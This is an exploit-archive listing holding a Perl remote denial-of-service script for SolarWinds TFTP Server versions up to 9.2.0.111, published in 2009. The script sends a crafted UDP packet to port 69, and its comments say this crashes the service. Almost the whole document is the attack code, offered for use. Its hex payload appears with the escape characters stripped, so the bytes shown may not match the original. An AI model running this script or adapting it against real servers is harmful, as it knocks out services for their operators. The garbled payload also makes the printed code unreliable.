SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit
# Published : 2009-08-31
# Author : Gaurav Baruah
# Previous Title : Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC
# Next Title : MailEnable 1.52 HTTP Mail Service Stack BOF Exploit PoC

#!/usr/bin/perl
# SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit
# by Gaurav Baruah
# TFTP Server Service stops after payload
# is sent, and has to be started again in Config
# Tested on XP SP3
# Big thnx: dragunov
# Greetz: Sanjay

use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$boom=
"x00x06x54x9dx68x21xdex59x30x9ax0bxb5xd4x94x94x42x3cxebxc5".
"xc1xe8x7dx31x34xeexd8x60x41x8fx92x25x9cx5cxccx78x6a";
$tftpudp->send($boom);

# www.Syue.com [2009-08-31]